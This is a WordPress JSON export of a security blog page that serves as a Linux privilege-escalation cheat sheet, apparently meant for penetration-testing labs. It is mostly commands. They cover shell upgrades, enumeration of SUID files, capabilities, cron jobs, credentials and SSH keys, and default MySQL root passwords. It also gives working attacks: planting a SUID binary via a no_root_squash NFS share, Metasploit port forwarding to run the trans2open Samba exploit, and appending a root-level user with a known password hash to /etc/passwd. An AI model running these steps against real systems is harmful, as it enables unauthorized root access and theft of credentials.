{"id":125,"date":"2021-04-24T00:52:20","date_gmt":"2021-04-24T00:52:20","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=125"},"modified":"2025-08-04T23:59:45","modified_gmt":"2025-08-04T23:59:45","slug":"linux-privilege-escalation-resources","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/linux-privilege-escalation-resources\/","title":{"rendered":"Linux Privilege Escalation - Resources"},"content":{"rendered":"\n<div class=\"wp-block-cover\" style=\"min-height:391px;aspect-ratio:unset;\"><img loading=\"lazy\" decoding=\"async\" width=\"6000\" height=\"3375\" class=\"wp-block-cover__image-background wp-image-126\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/04\/2-1.jpg\" data-object-fit=\"cover\"\/><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p>Linux Privilege Escalation<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-red-color has-text-color has-large-font-size\">What's my path to root?<br><\/p>\n<\/div><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>\n\ng0tmilk's Guide to Linux Privilege Escalation as well:\nhttps:&#47;&#47;blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/\n\nI just got a low-priv shell ! 
\nWhat would S1REN do right now?\npython -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nOR\npython3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nexport PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmp\nexport TERM=xterm-256color\nalias ll='ls -lsaht --color=auto'\nCtrl + Z &#91;Background Process]\nstty raw -echo ; fg ; reset\nstty columns 200 rows 200\n\nS1REN would say:\nVarious Capabilities?\nwhich gcc\nwhich cc\nwhich python\nwhich perl\nwhich wget\nwhich curl\nwhich fetch\nwhich nc\nwhich ncat\nwhich nc.traditional\nwhich socat\n\nCompilation? (Very Back Burner)\nfile \/bin\/bash\nuname -a\ncat \/etc\/*-release\ncat \/etc\/issue\n\nWhat Arch?\nfile \/bin\/bash\n\nKernel?\nuname -a\n\nIssue\/Release?\ncat \/etc\/issue\ncat \/etc\/*-release\n\nAre we a real user?\nsudo -l\nls -lsaht \/etc\/sudoers\n\nAre any users a member of exotic groups?\ngroups &lt;user>\n\nCheck out your shell's environment variables...\nenv\nhttps:\/\/www.hackingarticles.in\/linux-privilege-escalation-using-path-variable\/\n\nUsers?\ncd \/home\/\nls -lsaht\n\nWeb Configs containing credentials?\ncd \/var\/www\/html\/\nls -lsaht\n\nSUID Binaries?\nfind \/ -perm -u=s -type f 2>\/dev\/null\n\nGUID Binaries?\nfind \/ -perm -g=s -type f 2>\/dev\/null\n\nSUID\/GUID\/SUDO Escalation:\nhttps:\/\/gtfobins.github.io\/\n\nBinary\/Languages with \"Effective Permitted\" or \"Empty Capability\" (ep):\nhttps:\/\/www.insecure.ws\/linux\/getcap_setcap.html#getcap-setcap-and-file-capabilities\nGet Granted\/Implicit (Required by a Real User) Capabilities of all files recursively throughout the system and pipe all error messages to \/dev\/null.\ngetcap -r \/ 2>\/dev\/null\n\nWe need to start monitoring the system if possible while performing our enumeration...\nIn other words:\n\"S1REN... 
Is privilege escalation going to come from some I\/O file operations being done by some script on the system?\"\nhttps:\/\/github.com\/DominicBreuker\/pspy\/blob\/master\/README.md\ncd \/var\/tmp\/\nFile Transfer --> pspy32\nFile Transfer --> pspy64\nchmod 755 pspy32 pspy64\n.\/pspy&lt;32\/64>\n\nWhat does the local network look like?\nnetstat -antup\nnetstat -tunlp\n\nIs anything vulnerable running as root?\nps aux |grep -i 'root' --color=auto\n\nMYSQL Credentials? Root Unauthorized Access?\nmysql -uroot -p\nEnter Password:\nroot : root\nroot : toor\nroot :  \n\nS1REN would take a quick look at etc to see if any user-level people did special things:\ncd \/etc\/\nls -lsaht\nAnything other than root here?\n\u2022 Any config files left behind?\n\u2192 ls -lsaht |grep -i '.conf' --color=auto\n\n\u2022 If we have root priv information disclosure - are there any .secret in \/etc\/ files?\n\u2192 ls -lsaht |grep -i '.secret' --color=auto\n\nSSH Keys I can use perhaps for even further compromise?\nls -lsaR \/home\/\n\nQuick look in:\nls -lsaht \/var\/lib\/\nls -lsaht \/var\/db\/\n\nQuick look in:\nls -lsaht \/opt\/\nls -lsaht \/tmp\/\nls -lsaht \/var\/tmp\/\nls -lsaht \/dev\/shm\/\n\nFile Transfer Capability? What can I use to transfer files?\nwhich wget\nwhich curl\nwhich nc\nwhich fetch (BSD)\nls -lsaht \/bin\/ |grep -i 'ftp' --color=auto\n\nNFS? Can we exploit weak NFS Permissions?\ncat \/etc\/exports\nno_root_squash?\nhttps:\/\/recipeforroot.com\/attacking-nfs-shares\/\n\n&#91;On Attacking Machine]\nmkdir -p \/mnt\/nfs\/\nmount -t nfs -o vers=&lt;version 1,2,3> $IP:&lt;NFS Share> \/mnt\/nfs\/ -nolock\ngcc suid.c -o suid\ncp suid \/mnt\/nfs\/\nchmod u+s \/mnt\/nfs\/suid\nsu &lt;user id matching target machine's user-level privilege.>\n\n&#91;On Target Machine]\nuser@host$ .\/suid\n#\n\nWhere can I live on this machine? 
Where can I read, write and execute files?\n\/var\/tmp\/\n\/tmp\/\n\/dev\/shm\/\n\nAny exotic file system mounts\/extended attributes?\ncat \/etc\/fstab\n\nForwarding out a weak service for root priv (with meterpreter!):\nDo we need to get a meterpreter shell and forward out some ports that might be running off of the Loopback Adaptor (127.0.0.1) and forward them to any (0.0.0.0)? If I see something like Samba SMBD out of date on 127.0.0.1 - we should look to forward out the port and then run trans2open on our own machine at the forwarded port.\nhttps:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/\n\nForwarding out netbios-ssn EXAMPLE:\nmeterpreter> portfwd add -l 139 -p 139 -r &#91;target remote host] \nmeterpreter> background \nuse exploit\/linux\/samba\/trans2open\nset RHOSTS 0.0.0.0\nset RPORT 139\nrun\n\nCan we write as a low-privileged user to \/etc\/passwd?\nopenssl passwd -1\ni&lt;3hacking\n$1$\/UTMXpPC$Wrv6PM4eRHhB1\/m1P.t9l.\necho 'siren:$1$\/UTMXpPC$Wrv6PM4eRHhB1\/m1P.t9l.:0:0:siren:\/home\/siren:\/bin\/bash' >> \/etc\/passwd\nsu siren\nid\n\nCron.\ncrontab -u root -l\n\nLook for unusual system-wide cron jobs:\ncat \/etc\/crontab\nls \/etc\/cron.*\n\nBob is a user on this machine. What is every single file he has ever created?\nfind \/ -user bob 2>\/dev\/null\n\nAny mail? 
mbox in User $HOME directory?\ncd \/var\/mail\/\ncd \/var\/spool\/mail\/\nls -lsaht\n\nLinPEAS:\nhttps:\/\/github.com\/carlospolop\/privilege-escalation-awesome-scripts-suite\/tree\/master\/linPEAS\n\nTraitor:\nhttps:\/\/github.com\/liamg\/traitor\n\nGTFOBins:\nhttps:\/\/gtfobins.github.io\/\n\nPSpy32\/Pspy64:\nhttps:\/\/github.com\/DominicBreuker\/pspy\/blob\/master\/README.md<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-125","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=125"}],"version-history":[{"count":58,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125\/revisions"}],"predecessor-version":[{"id":800,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125\/revisions\/800"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}